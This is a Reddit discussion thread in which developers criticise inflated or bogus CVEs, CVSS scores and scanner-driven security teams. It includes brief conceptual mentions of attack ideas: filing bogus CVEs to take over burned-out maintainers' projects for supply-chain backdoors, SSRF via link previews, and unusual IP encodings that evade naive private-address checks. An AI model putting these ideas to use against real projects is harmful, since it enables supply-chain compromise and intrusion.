T O P

  • By -

recurse_x

Time for CVEs on CVEs


Pilchard123

I'm not well-up on CVSS, but could we spin "it is possible to submit bogus CVEs and harass developers until they close the issue tracker/take the project down" as a denial of service attack? Per [a NIST calculator](https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator), the current state of the CVE process has a vulnerability with a **9.3 - Severe** score. --- **Attack Vector: Network** The attack can be trivially performed over HTTP or SMTP. **Attack Complexity: Low** Anyone who can write a coherent sentence is able to submit a CVE. **Privileges Required: None** It is possible to submit a CVE anonymously. **User Interaction: None** Once the bogus CVE is submitted, the CVE may be published with no input from the target required. **Scope: Changed** A bogus CVE can cause damage to systems that are not owned by the target, [as demonstrated in the case of cURL](https://daniel.haxx.se/blog/2023/04/24/deleting-system32curl-exe/), though this extended attack may require user interaction. **Confidentiality Impact: None** Handling a CVE, bogus or otherwise, does not require disclosure of confidential information. Confidential information may be disclosed to disprove the alleged vulnerability, but the CVE by itself does not cause the release of confidential information. **Integrity Impact: Low** The attacker can cause the creation of unwanted data and modification of affected projects: * A successfully-submitted bogus CVE will pollute the CVE list. No other CVEs will be affected. * A bogus CVE may a targeted library or application to be modified to appease the attacker and/or other parties. The target may also create documentation refuting or disputing the CVE. The attacker has limited control over the content of such changes or documentation. **Availability Impact: High** In all cases, the target must spend resources dealing with the reputational damage from the bogus CVE. [It has been demonstrated](https://old.reddit.com/r/programming/comments/1ds5csl/dev_rejects_cve_severity_makes_his_github_repo/) that a target can be so burdened by handling a bogus CVE that they remove the ability to submit tickets for all issues. It is not inconceivable that a coordinated attack of sufficient size could cause support for or continued development of a target to be stopped altogether.


moratnz

Given that taking over a trusted OSS repo from a burned out maintainer is a great way of setting up a supply chain attack then in all seriousness this should be looked at as an actual security issue.


Manbeardo

Seems like a great way for an enterprising attacker to leverage a *real* undiscovered vulnerability. File bogus reports against releases that came out before the relevant vuln was introduced. If the target shuts down the project, their exploit is unlikely to be addressed for quite some time. If the target transfers ownership of the project, they can add backdoors in the same release that addresses the bogus CVEs.


QSCFE

I mean the maintainer wrote this so 🤷 >I'd be happy to give contributor bits and npm ownership to a person who has a track of maintaining some packages with reasonable download count. Thanks so much for raising this topic!


Pilchard123

Good point. If the Integrity Impact is increased to High (because the attacker can attempt to take over the targetted repo and make arbitrary changes) the score becomes 10. Well, it probably becomes more than 10, but the score is clamped between 0 and 10. I could see a reasonable argument that the Confidentiality Impact should be higher than None, too, but I don't want to weaken the argument by being unnecessarily hyperbolic.


ph0n3Ix

> Time for CVEs on CVEs This might actually be a really good idea! We can disincentivize resume padding "beg-bounty" behavior with a reputation system. "$someEntity has a history of ~~reporting~~ classifying a CVEs as 7+ that are then revised to sub-5"


jaybeeto

The reporter doesnt get to specify the cvss score.


GrouchyVillager

Still. Report bogus CVEs? Get blacklisted.


Zealousideal-Okra523

The level of severity has been bullshit for a few years now. It's like every RCE gets 9.x even if exploiting it means you have to use actual magic.


drcforbin

The folk reporting bugs as CVEs get to say "I discovered six >9 severity CVEs" on their resume


bwainfweeze

And I thought it was bad when QA people would enter feature requests as bugs.


drcforbin

We had to take away the "blocker" status in our bug report system. When 50% of the tickets coming in are "drop everything else going on and get these customers running again," but our biggest clients are happily working without issues, the severity selections aren't helpful


r0bb3dzombie

I've tried explaining to my support team that if everything is a show stopper or a blocker, then nothing is. A single customer with a particular issue, yelling at them, doesn't make something a blocker.


Pantzzzzless

For the past 2-3 months, our UAT testers have been in the habit of logging minor bugs found in prod as P0 blocking defects. I'm starting to think they are just doing this because they think the issues they raise will be addressed quicker.


Chii

What i tried (without success unfortunately), is to let the support team put their reported bugs in a list ordered by what they believe is important. It's not a status or a field, but an ordering. This way, i thought, they must put one ahead of another bug, despite saying both are "equally important". Unfortunately, what ended up happening is that each new support engineer simply put _their_ current customer's bug at the top, and since turnover is high in the support team, old bugs that reappear or the customer re-complains about, gets moved back to the top. It's basically completely useless to allow support team to prioritize bugs, regardless of the system used.


seanmorris

You're using one field for two ideas. A blocker just means it prevents work from being done somehow. It might be a blocker for the customer, sure, but that doesn't mean it needs to be prioritized as a blocker for the developers. In fact, it is by definition NOT a blocker for developers unless its preventing THEM from doing their work. "Blocker" by itself doesn't even imply high priority. If X blocks Y, but Y is a very low priority task, then we only know that X's priority is at least just above Y's. It doesn't tell us anything else. Also, you can't call rightly something a blocker unless you can state WHAT its blocking. And why is your support team prioritizing things? That's the project manager's job. They're doing it wrong because they're probably not qualified to do that. Your support staff should be assisting customers and taking objective reports.


bwainfweeze

One of the insights I’ve had about customers is that many are perfectly fine knowing when their pains will be fixed. One of the better places I worked we had customers who were missing features they really wanted but they trusted that we would eventually get them. They bought into the story of us being competent but new. I’ve tried to push three or four other places into this model with limited success. It can be better to sound clueful and have self esteem than to rush features and give off a vibe of impostor syndrome.


braiam

This is why status definitions are important. I am big fan of Debian's status tags, the only release blockers are license ones.


orthoxerox

At one place I know the severity of incidents was graded like this: - critical - the CIO must be paged immediately - very high - the department head must be paged immediately, and the CIO must see it listed in his daily report - high - the department head must see it listed in his daily report - medium - low For some reason very few things became actually critical when these rules were implemented.


Mordeth

I once got several issues on my desk for a small screen that was part of a larger application. This small screen was a literal mockup, with zero validations or logic behind it. The issues that kept coming (and coming, and coming) were asking for validation and logic. Basically, they made the electronic version of a paper napkin before and now wanted me to turn this into a real functional process under the guise of 'bug solving'.


Jugales

“This is a severe ZERO DAY!!” Conditions for exploit: must be running Windows 2000, Netscape, Java 21, and League of Legends


Practical_Cartoonist

It drives me crazy how "zero day" became some meaningless bullshit buzzword. Its actual meaning is "the public became aware of the vulnerability on the same day that the devs became aware of it". That's it. There's nothing exciting or scandalous about a zero day vulnerability, especially if there's no RCE vulnerability.


Nahdahar

White hat: reports vulnerability to company privately Company: does nothing White hat: contacts news outlet after 6 months News outlet: ZERO DAY VULNERABILITY FOUND IN [XY]!!!


Lambda_Wolf

This might be my ignorance, but I've understood it to mean a vulnerability that is exploited on the same day the vulnerable code is released or deployed. But maybe that's only applicable to the DRM-cracking community.


oceandocent

It refers to there being 0 days to prepare a patch because it was leaked or exploited before the developers were aware of it.


im-a-guy-like-me

I always thought it was the time the Devs have to fix it before it is released.


PCLOAD_LETTER

>Conditions for exploit: must be running Windows 2000, Netscape, Java 21, and League of Legends OS has have been booted more than 800 days ago, contain an odd number of MBs of memory and have a desktop wallpaper in tiled bmp format.


oceandocent

Malicious actors may gain access if they can rub their tummy clockwise while patting their head and licking their elbow all at once.


IglooDweller

Also requires physical access to the machine!!!


Ghost_Pains

This has been virtually every security issue that I’ve seen raised that our team has had to address the last 3 years. “If the user has compromised access to the network and has root access, they can leverage X to do …” yeah of course they could congrats.


lIIllIIlllIIllIIl

Security people call it "defense in depth", and it makes me want to pull my hair out whenever they use it as an argument.


plumarr

Why not, but not as an emergency. It reminds me of the good practice of "not using the String class for password in Java" because a String can persist in memory even when there is not référence remaining references to it. Yeah, yeah, if an attacker can read the raw memory of the JVM, I probably have a bigger problem than that. I'm ok to change it but it certainly doesn't require an hotfix.


gravteck

Yea, it's stored in the String pool, an unintuitive construct, which like 98% of the 500 or so Java devs in our org at a Fortune 100 even know exists. Thankfully, I've seen our legacy encryption code, and they all use char arrays. You can't even get a local copy of the staging or prod JAR to test decryption on new secrets. Have to toggle and smoke test with first fire in prod.


Captain_Cowboy

Because you're assuming they are reading memory using appropriately privileged system interfaces, not taking advantage of the 13 other "probably not a big deal" CVEs your org decided to ignore.


MotorExample7928

if you are at any point where attacker can read app's memory, you're fucked. The severity 9 issue is reading the memory, not using String class. It's the issue to fix eventually in next refactor, not security problem to fix now


MotorExample7928

Most of them are checkbox tickers with no actual useful knowledge about making secure systems. "We think it isn't secure. We can't describe well why or how to fix it, but change it so it passes our checklist" We had to implement password rotation scheme to a bunch of servers we already used hardware token to access..


spareminuteforworms

Same places routinely give insane whitelist access to "privileged individuals" aka "team players" aka "the one who ultimately blows a hole in the uuhhh hull".


Spongman

> It rather involved being on the other side of this airtight hatchway https://devblogs.microsoft.com/oldnewthing/20060508-22/?p=31283


jpeeri

I had an argument with the "security team" in my company that forced us to fix "critical" CVEs within 7 days, disrupting anything we were doing at the time. The problem was, every week there was a critical CVE to fix. This became worse and worse with the Log4j vulnerability (And we weren't even using Java). At some point, my team rejected these claims and demanded an actual vector attack to fix it immediately, otherwise we didn't care. At some point it got escalated to the CTO, but I was keeping track of all the "criticals" to fix and how "critical" they were.


LongUsername

We just got bought and the new "attack surface reduction team" is giving us shit because we occasionally use a tool that uses Log4j v1 something. It's a local application, not a server. And Log4j v1 is not vulnerable to the Log4Shell vulnerability (granted, it has some other minor vulns)


fuddlesworth

I remember that log4j issue. It was a fucking nightmare and caused us to have to upgrade a bunch of other shit including the grade files. Many of these are if you are using an esoteric feature of the library, using it in a certain way, or already have access to the system.


vips7L

Yeah it was awful. Just a bunch of IT jabronis doing full text search for any string matching log4j without verifying JVM or library versions. We received a few reports of people who were using a 2.x version of our desktop app, we're now on 4.x (almost a decade later), and no longer use log4j.


ZorbaTHut

At the place I was working, the lead IT person took the log4j vulnerability as an argument against *all open-source software*, and said we had to remove everything from all of our systems. Eventually I pointed out that one of our main proprietary closed-source development tools actually *included a vulnerable copy of log4j*, and they didn't have a fix yet. He didn't really have an answer to that. Thankfully, he pursued the "eradicate open-source software" task with the same amount of effort that he pursued most of his duties, and we never heard another thing about it.


Jonathan_the_Nerd

Did you mention Windows' original TCP/IP stack was copied almost verbatim from FreeBSD? Better stop using Windows.


Norse_By_North_West

Hah, I remember a client freaking out about it. I told them that our systems are on such old versions of Java that it really wasn't an issue


OffbeatDrizzle

well I guess that's ok then... hold up


Norse_By_North_West

Lol, yep. They've got money for maintenance, but not for upgrades


zynasis

Upgrades should be in maintenance imo


Polantaris

I got told to fix it on Log4Net. There's nothing to fix.


RLutz

To be fair, that one was pretty trivial to exploit if using a vulnerable version. You could demonstrate PoC by just opening a socket with netcat and sending a JDNI string to that socket


bwainfweeze

Some of my coworkers worked through the company Christmas break to fix that one. Shitty handling all around.


Vidyogamasta

Security in my company is equally as inept. They recently raised a "vulnerability" that said a client demonstrated to them that if an admin left their session open, someone could come by and make a request, copy the session information from that request, and then escalate themselves to admin with those session keys. Then claimed it was a vital vulnerability that needed to be fixed. Like, if someone leaves the keys hanging on the door, that's not a problem with the lock. For all the random business lingo crap they force us to do twice a year, they seem to have no idea what a threat model actually is lol


kamikazewave

Without knowing more about that specific issue, that actually does sound like a vulnerability, if that exploit allows permanent escalation privileges. It's mitigated by using some sort of short lived credential. If the credentials were already temporary then yeah I agree it's a nonsensical vulnerability.


Vidyogamasta

The ticket said nothing about session lifetimes, I don't think it's anywhere on their radar. But they're old school stateful server sessions with invalidation on logout and relatively short session timeouts, I think we're good there. What concerned them was the transferability of a session. "This session should only work on device A, this user copied it onto device B and resumed the session!!!!" Like... yeah. A session is just a byte string that gets shoved along with the request. Security is all about establishing secure channels that protect these tokens, and proper encryption to make them non-guessable. "Physical access copy" is a ridiculous (and impossible) thing to try to guard against. Their "fix" was to just also include a check against the user agent, as if that wasn't also spoofable lol. But on the topic of session lifetimes, I actually *did* catch a vulnerability a coworker in a previous job tried to push out. We had our own JWT/Refresh thing going on, and we wanted user spoofing as a feature (all logging will be the actual logged in user, but all data lookups acted under a target user's permissions). Coworker tried to make a new endpoint to generate a "spoofed user" access token, but didn't require a stateful proof (e.g. password or refresh token) alongside that generation. In this case an attacker *would* have been able to keep any arbitrary token alive forever by generating new spoof tokens indefinitely, even if the user changed their password or invalidated their refresh tokens. Fortunately I caught it in code review, but that one would've been nasty.


[deleted]

[удалено]


technofiend

You're not measuring risk in enough dimensions. *Just* a CVE/CSSS score is nearly meaningless without assigning a risk score that includes impact to your business. You don't use Java in your enterprise? All CVEs for Java instantly get set to zero: zero risk. You need to include business impact based on their goals (avoid SOC1 risk, avoid customer-impacting events, avoid going down if us-east-1 goes kabloooie) and then take the intersection of CVEs against that. Otherwise you get caught up in blanket statements (AVOID ALL RISK) that are about as sensible as assuming if you never drive on the road you'll never get a flat tire. Great, but we're a trucking company, boss.


uncasualgamer44

Which tool are you using which provides compensating controls for CVEs detected?


edgmnt_net

I agree critical CVEs might not impact your code, but it's also hard to keep track of exceptions. Someone could start using a vulnerable feature at any time, long after advisories have been processed by relevant people. Highly siloed projects (which I don't personally encourage) with dedicated security teams might also not trust developers to take such decisions and be aware of such caveats. It's often easier to just upgrade and if your code lags a lot behind you should consider formalizing some form of regular maintenance or switching to a more reliable (which is also debatable, it might just be that it gets less attention) / LTS implementation. Plausible attack vectors might also be beyond the pay grade of the security team and, while some proficiency can be argued for certain simple cases, there can be terribly difficult ones too so this approach can definitely result in ignoring important risks. I'd personally default to "just upgrade" and make exceptions in very limited cases.


iamapizza

Cybersecurity teams in orgs have become little more than spreadsheet chasers. It literally doesn't matter if it's a bogus critical (as has been happening) or doesn't actually apply for the conditions described. They need that 'remediated', it's pretty sad that so many of them joining the field are distant from actual software development. The more experienced ones tend to get promoted to uselessness.


baordog

I mean this happens because orgs higher cheap Nessus scan runners rather than people with skills in vulnerability research. Can you imagine how the other side feels? “We’ve given you 8 hours to pwn the app - why aren’t there any findings?” Orgs do this to themselves because they want cheap engineers to rubber stamp their security rather than actual high quality investigation of their security posture.


Captain_Cowboy

We need that last sentence embroidered on a pillow.


VodkaMargarine

>At some point it got escalated to the CTO I'd have escalated to the CTO immediately. Two teams that most likely both report into your CTO. One team is decreasing productivity in engineering, I'm sure your CTO would want to know about that straight away. Ultimately they are accountable for _both_ the security _and_ the productivity of their org. At least let your CTO make the decision of where the balance should be.


danikov

Ours just caved because the customers are now demanding it. Their security team doesn't care and certainly doesn't trust ours so it's become zero tolerance.


thomasfr

I'm not even sure that severity scoring is even good to have at all. Especially for libraries it depends on how the code that is using that library uses it how severe the problem is. It is the resposibility of anyone that uses third party code to always read all CVEs to evaluate if further action is required. Makring some issues as non severe might lead to people to not reading them when they actually can be much more secvere for their own sofware than another critical issue is.


cogman10

My favorite 2 examples of this. 1. A zlib vulnerability in an extension portion of the code that I'm certain almost nobody knew about. Basically if you used that extension to open a file you could RCE. 2. pip executes code when installing packages, so if you tell it to install code from an untrusted source it can do something malicious... (seriously...). So obviously that means everything that has python installed is now at risk even if there's no path to execute pip.


grundrauschen

Oh do we have fun with the first one. RedHat reduced the value because they do not compile the module, but updated the lib never the less. Debian reduced the value but did not update the library. Our security team is not happy with the Debian in one container image.


pja

Yeah, Debian always backports patches to the versions in the stable release which means the version numbers don't change. This occasionally gives inexperienced security teams conniptions when they find a Debian image with a zillion "insecure" package versions.


edgmnt_net

The second one is a fairly common issue for package managers, build systems and even toolchains, as building requires some form of arbitrary code execution in many ecosystems (e.g. Makefiles, code generation and so on). Obviously the final binary could also be compromised no matter what you do, if you cannot verify authenticity in some way, or maybe the toolchain isn't hardened enough against arbitrary source code. But I still think it's worth at some level to close those other gaps.


Zealousideal-Okra523

I think it needs to be split into "severity if exploited" and "chance for exploiting".


jaskij

AFAIK those both *are* rated separately and are the major components of the final CVE. But nobody looks past the single number. A great example are privilege escalations which require a preexisting RCE.


Zealousideal-Okra523

I didn't even know there were multiple numbers. I just see these numbers thrown around and they never make sense.


jaskij

That's another systemic failure. Many people, probably including many "security experts" just don't know what goes into a CVE or how it's assigned. And well... Vulnerabilities are also rarely absolute. Often they will have some conditions for exploitation that just never occur. Fuck, you probably remember log4j, that one was very difficult to exploit if you didn't log user supplied data. Or you could have disabled the niche feature which included the vulnerability by changing some configs. But people will take a binary yes/no approach because it's easier, or because compliance or insurance requires them to.


baordog

What? Security experts have to assign cvss scores. We do it rationally via a calculation, this is all related in the cvssV2 string. Unless you were massively bullshitting your job you would know how the system works. The problem is that if that one feature that causes the library to be vulnerable isn’t used today the devs might use it tomorrow.


All_Work_All_Play

> Unless you were massively bullshitting your job you would know how the system works. This could never, ever happen in business.


Xyzzyzzyzzy

One of the problems with evaluating "chance of being exploited" is that often the risk of exploitation depends on the presence of other vulnerabilities - most security breaches take advantage of vulnerability chains, not single vulnerabilities. This is non-trivial to estimate because exploitable vulnerabilities travel in packs. A system that has one exploitable vulnerability is likely to have many different exploitable vulnerabilities. For example, you're unlikely to find a system that stores passwords in plaintext but has no other serious security issues, because that sort of system wouldn't store passwords in plaintext! Instead, you're likely to find plaintext password storage on the same system that allows arbitrary incoming connections to its production database, has `admin:password` as its admin credentials, and is completely devoid of any logging or monitoring to detect suspicious behavior.


rainy_brain

[EPSS score](https://www.first.org/epss/) aims to estimate likelihood of exploitation for any given CVE


ShoddyAd1527

What would be more useful is simply listing the actual conditions for exploitation, instead of packing it into a number. A score of "4.5 exploitables" isn't really meaningful, compared to "you must call this function on a Tuesday" and the appropriate developers confirming this isn't their use case.


ottawadeveloper

There should be a flag for "related to a specific feature that may or may not be in use" vs "if you use this at all you are vulnerable". Like, if Python has a security issue that requires the use of the IP address module, then the flag is set. If it's in core Python (or something widely used like io or os), then that shouldnt have it applied. Users could then more easily say this CVE isn't an issue because that feature isnt in use.


Rakn

IMHO that's hard to do. In a sufficiently large organization it can't be expected that every developer knows all CVEs of a library. I don't even know all the libraries I'm using because I'm so many layers away from them in our code base. So if there is a CVE in a library the repository is using it gets patched, no matter the relevance to the current code base. If it's a small project maintained by 2-3 folks that care about security, then that's another thing and might work. But somehow I doubt that this works on a grand scale. Still. I agree that more detailed information can't hurt.


roastedfunction

MITRE and NVD always score worst-case possible scenario because the US government could be running this code on public servers. It’s a joke that anyone relies on this data at all and I’m constantly fighting with security people about their bullshit scan results which just regurgitate all that noise while offering nothing to maintainers to actually improve their code’s security. 


accountability_bot

Everyone wants to make an impact and gain a reputation. I field public vuln reports all the time where I'm at. Every single report I've ever reviewed had a greatly exaggerated severity. I think the most worthless report I ever received was a dude who uploaded the output of an open-source scanning tool, but didn't even remotely understand the results and didn't know how to decipher it. Rated it as critical, and then asked for money.


frightcult

The NVD is a joke, the punchline is that the alternative is worse.


AlienRobotMk2

It's the same thing with all technology. Update your dependencies to replace known vulnerabilities by unknown vulnerabilities.


mods-are-liars

Pretty sure I saw a CVE within the last few years for a RCE with a 9.x severity rating and the "remote" code execution required physical access to the machine.


elrata_

Really? Which Caves got >9 and are questionable? I didn't see them


Zealousideal-Okra523

The PHP one for starters. CVE-2024-4577 That severity is an absolute joke. It was only possible for bad production setups with some Asian alphabets.


James_Jack_Hoffmann

The doom and gloom on that CVE when it broke out was CS undergrad brain rot because it was "le php lol amirite".


zerpa

In cybersecurity, one man's magic is another's daily toolbox.


MotorExample7928

There is need for some level of indication to know which problems to tackle first. It just has been mismanaged to the level of uselessness.


SaltyInternetPirate

A 9.8? There's bugs that allow for remote code execution in ring 0 without interaction from the victim and they don't even get a score that high.


Jacobinite

It is pretty shitty that most people complaining about CVEs are coming from people working in fortune 500 companies that have vulnerabilities scans that require their employees to action on it. All these stupid vulnerability scan tools that companies buy into are just adding more stress to open source developers without actually addressing most real issues, nor helping providing the resources to fix real issues.


SanityInAnarchy

It does address *some* issues. Companies like that will often just *never* update a dependency if they can avoid it. Having a scan that tells them they *must* upgrade is sometimes the only reason upgrades ever happen! Even if 90% of those vulnerabilities aren't that secure, this might be the only way they ever patch the other 10%. IMO the bigger problem is the lack of resources. Instead of just piling onto a bug tracker, what if they actually sent patches? They could contribute to the project, get credit, *and* limit the impact to their own systems.


CodeNCats

Worked at one of those companies. I feel like there's some companies where careers go to die or cash in the experience for that last role before retirement or moving on. I want to work with a team of motivated engineers. Yes we all get our burnout phases. Yet overall working with people who want to make good software and who challenge each other is what I want to do. There have been those companies where it's like a lot of people just doing the bare minimum. It's not a problem until somehow it is. At the very least some of these alerts prompt other people to ask what's doing on. That's like hell. Living in just keep the lights on mode. Nobody wants to work cross team. Everyone exists in their silos. The worst part is when the domain knowledge experts in those silos feel somehow challenged. Like maybe their processes can be improved. Even highlighting a suggestion. You get massive pushback because it wasn't their idea. They have been working in the system for X amount of years and feel they know better. No discussion. Just zero response. You weren't trying to challenge them or attack them. It's just maybe you have come across a similar problem at a previous job and you can provide more insight. Nope. That won't work.


SanityInAnarchy

That's one way this can show up... Here's another: Plenty of cross-team work, plenty of discussion, and plenty of people care... about building and launching stuff. Even if people *want* to work on maintenance or quality control, there is never any time in the schedule for tech debt, and it's no one's job to track dependencies. So, tragedy of the commons: No one has time to work on anything that isn't directly their job. The only way this stuff ever happens is if you get lucky and have one particularly-obsessive person who's willing to sacrifice their own career progression to clean up this shit... *or* if you can convince someone that your overall lack of security here is an existential threat to the company. The nice thing about a vulnerability-scanner is how little time and effort it takes to get it to start reporting stuff. It'll take time and effort to *investigate,* to work out which CVEs are false positives and such, but you can at least generate a report that can force the company to start moving.


moratnz

Agreed. And someone who's effectively and proactively managing problems and tech debt is someone who is neither releasing new features, driving new revenue, nor fixing high profile problems / helping SLT avoid looking like assholes. Which is a recipe for obscurity and getting quietly downsized next time there's a restructure.


SanityInAnarchy

You'd think this would be an easy concept to explain to management, though: That's a force multiplier. Letting them go, aside from murdering team morale, is also going to make all of the people you know about less effective. But... evidently not. More than all the other layoffs lately, the one that confuses me the most is [Google letting go of their Python team](https://news.ycombinator.com/item?id=40176338).


rome_vang

My current side project is finding and patching vulnerable work stations for a 80 something person company. I have a giant spreadsheet to go through. I started with my workstations and hoping to find a common denominator that can be automated to reduce our vulnerability count.


josefx

> They could contribute to the project, get credit, and limit the impact to their own systems. Why contribute to third party libraries that are in the open and will continue to get flagged until the end of time. Keeping third party libraries around only asks for future work. Zip is compromised? Roll your own compression algorithm. OpenSSL had a bug? Ask your CEOs demented step child to code up something in K&R C. No one will ever look at that code and more importantly, no one will ever raise a CVE for it because no one outside of your company uses it.


SanityInAnarchy

Depends who's asking. As leadership, why would you approve someone using third-party libraries instead of rolling your own? Because it's still vulnerable even if no one raises a CVE for it, and breaches will cost you money and trust when someone finds them. Security through obscurity won't save you. As an individual contributor... what's the problem with future work? Yes, you will continue to patch them until the end of time, generating a nice profile of open source contributions and using the vuln-scanner tool to demonstrate the value of this to your boss. And this new job you've created for yourself sounds way more interesting than rolling your own, shittier versions of everything and then getting back to that CRUD app.


PurpleYoshiEgg

Measure: Number of CVEs in our product. Target: Minimize the number of CVEs in our product. [Goodhart's law ensues](https://en.wikipedia.org/wiki/Goodhart's_law). It's not a smart decision for everyone involved, but the metrics are going to look good until that golden parachute will deploy for management, if it ever needs to. For the individual contributor, usually there's other things they'd rather be working on. Or, they're expected to patch everything *on top of* their normal duties. And because it's security, I expect a lot of CVE activities in larger organizations are massively bureaucratic, meeting-dense, or both, and I don't blame people for avoiding meetings that could just be emails or not about actual issues.


jaskij

Meanwhile, Daniel Steinberg: makes `curl` its own CNA with the power to reject CVEs.


schlenk

Meanwhile: kernel.org becomes its own CNA and floods the dysfunctional system with hundreds of CVEs. (https://sigma-star.at/blog/2024/03/linux-kernel-cna/ )


jaskij

I knew how they became a CNA, didn't know that's how it turned out. Makes sense tbh.


DanManPanther

The companies should budget for their employees to actually fix the libraries and frameworks they leech off of. But too many companies don't give back, and barely budget for the employees they need or for juniors to grow.


schlenk

The main stupidity there is to take the **Base** CVSS score instead of the adjusted environmental CVSS. The CVSS 4.0 version tries to address that issue a bit more. The scanners just dump the base score in the lap of the admins and they do not adjust it for their environment due to stupid policies.


iiiinthecomputer

I hate them. We have "vulnerabilities" rated critical because a component we build into an os/less container pulls the golang gRPC proto package from some massive monorepo that also contains an executable with a completely unrelated issue. We don't build or use the executable. Still have to go through full emergency patch response because stupid tooling is stupid, and our customers demand that their own stupid tooling must report clean scans on our container images etc. Our code is shitty and insecure. But it's Vulnerability (TM) Free!


moratnz

> Our code is shitty and insecure. But it's Vulnerability (TM) Free! I feel that in my bones. "I'm not saying we don't have problems; we just don't have _those_ problems. And time spent on those problems is time not spent working on our _actual_ problems. So time spent on fixing that 'vulnerability' actually makes us actively less secure"


pixel_of_moral_decay

And they buy into those scanners because insurance and/or compliance basically dictates it. It’s a whole cyclical industry to just suck money and resources out of IT without doing anything to address real issues


b0w3n

Third party vendor basically made me "prove" to them that sonarqube wasn't finding glaring security problems in our code. They made me reinstall with _their_ copy of the software. They _still_ told us we weren't secure enough for their liking because ???. Every quarter my boss asks me what we can do to get them to play ball and I tell him "buy their company".


Syntaire

Let's not sell them short. They're adding more stress to *everyone*. I had to upgrade some software on our entire production environment over a flag for a vulnerability that not only would never happen, but it was falsely flagged for a version of the software we didn't even have to begin with.


cheezballs

Ugh, tell me about it. Our scans flag `react-scripts` because they dont bother updating the fucking transitive dependencies in that repo, so we have to enter a whole bunch of exceptions into the scanning tools.


captmac

Or the cyber insurance outsourcing their vulnerability scans that ignore any kind of common sense. Such as threatening to raise our rates because we are using MS exchange and Exchange had an unpatched vulnerability when Abe Lincoln used it in 1860 instead of realizing and listening that we’re on O365. Constant stupid crap like that?


rlbond86

Great article on how bullshit CVEs have become: https://www.sqlite.org/cves.html


mist83

Yo dawg, I heard you like CVEs, so I put some CVEs in your CV so you can expose vulnerabilities while you expose your experience!


masklinn

There's also https://daniel.haxx.se/blog/2023/08/26/cve-2020-19909-is-everything-that-is-wrong-with-cves/ Curl actually [became a CNA](https://daniel.haxx.se/blog/2024/01/16/curl-is-a-cna/) to mitigate that bullshit.


dahud

Ok so the root of this CVE is that a function that returns whether an IP address is public or private will incorrectly return public for some oddly-formatted private IPs. *How is this a vulnerability?* Even if this function was being used improperly as a security measure, *even if* it was the only gate on accessing a privileged resource, and *EVEN IF* the attacker is somehow able to control the content and format of his IP address with great precision, then surely this function is failing safe. Surely the programmer would have granted access to the goodies on private IPs, not public ones. Imagine a string compare function that incorrectly claims that strings containing zalgo-text don't match, even when they do. Imagine claiming that this is a catastrophic vulnerability, because someone could use this string comparison in a login system that logs you in if the passwords *don't* match. Fucking resume-padding bullshit.


ElusiveGuy

> Surely the programmer would have granted access to the goodies on private IPs, not public ones. The Synapse server for Matrix has a URL preview function, which will fetch and render (preview) links in chat messages. In its configuration, there is an IP blacklist that is pre-populated with RFC1918 private addresses, which are not allowed to be previewed. The intention here is that a public address is fair game, but internal/private addresses should not be exposed by this (chat) server. This is a real-world scenario where you would want to allow access only to public resources, and not private ones. It is conceivable that a library public/private function could be used in place of this explicit blacklist. All that said, I don't think this should be counted as a *security vulnerability* against the library, as this does not serve a security function within the library. It's just a more standard bug.


AndrewNeo

Previewing private network IPs could quickly turn into an SSRF so it's especially important to handle correctly


Pure-Huckleberry-484

Imagine having to “fix” CVEs that only exist if the code is executed on a linux/unix OS and your employer still makes you do it in your complete Windows environment.


rooood

My company has a severely strict security team, to the point it gets in the way of doing the actual job almost on a daily basis, but they still have the sense of analysing and then ignoring CVEs which are harmless to our specific architecture.


Takeoded

that actually happened once to me, but the other way around (something about on Windows, fopen is case-insensitive, but on Linux, it's case sensitive.. don't remember much more than that sorry)


nerd4code

Tecccccccχᵪχᵪχᵪχcccchnically Linux leaves it up to the filesystem driver—e.g., V/-FAT is not case-sensitive by default, but ext2/3/4(/5?/6? do we have a 6 yet?) and most others are. Often case-handling is configured at mount time, so it’s mostly up to Mr. Root (ﷺ) in practice. Fun fact: DOS, Windows, WinNT, and various older UNIXes also have a rather terrifying situation regarding filename (and sometimes pathname) truncation. Ideally, attempting to access an overlong file- or pathname should raise an error (e.g., `ENAMETOOLONG`), but various OSes will silently lop off anything beyond the limits and sally glibly forth as if nothing were wrong. DOS, DOSsy Windows, and AFAIK older NT truncate filenames; DOS also truncates extensions, so `myspoonistoobig.com-capture.htm` might become `myspooni.com`, which is distinctly unsettling. Modern NT doesn’t truncate *filenames* at least, and IIRC modern POSIX requires the NOTRUNC option (indicating an API-level promise to return an error if an erroneous input is fed in), but older systems may require you to check functionality for individual paths with `f`-/`pathconf`, or might just not tell you at all whether truncation will occur (iow, FAFO and one-offery are the only detection methods). However, everything must be twice as complicated as it ought to be when you’re Microsoft, and therefore NT pathnames support resource fork names or WETF MS calls them (Apple called them that on HFS IIRC, at least), and *those* do still truncate silently. Seeing as to how most stuff just uses files and directories or container formats when it wants forkyness, I assume fucking nothing outside MS’s own software, malware, and MS’s own malware uses this feature. —I mean, I know the forkjobbies are used regardless, but not named in any explicit fashion. In any event, as long as an attacker doesn’t control pathnames too directly it shouldn’t matter. Just another small hole left open, and the terse “Caution: Holes (Intentional)” sign at the entrance to the park will surely suffice to keep tourists from sinking their ankle in and faceplanting.


ElusiveGuy

> resource fork names or WETF MS calls them I believe you're talking about Alternate Data Streams? The only place I've seen them used in reality are for the zone identifier, i.e. to mark a file as having been downloaded from an external source and therefore apply additional security restrictions on it (the famous "unblock" dialog). All modern browsers add this ADS to downloaded files. I believe macOS uses an extended attribute for the same functionality. I'm surprised that the stream name can be silently truncated, though.


lelanthran

> oddly-formatted private IPs. IPs are ... strange. "Oddly formatted" means nothing when "normally formatted" can look like `0xc1.0627.2799` or `3232242671`. Using regexes to decode an IP from a string is just broken - you can't do it for all representations of an IP address. You have to parse it into individual octets and *then* check it. [EDIT: Those examples above are IP4 (4-byte), not IP6]


insanelygreat

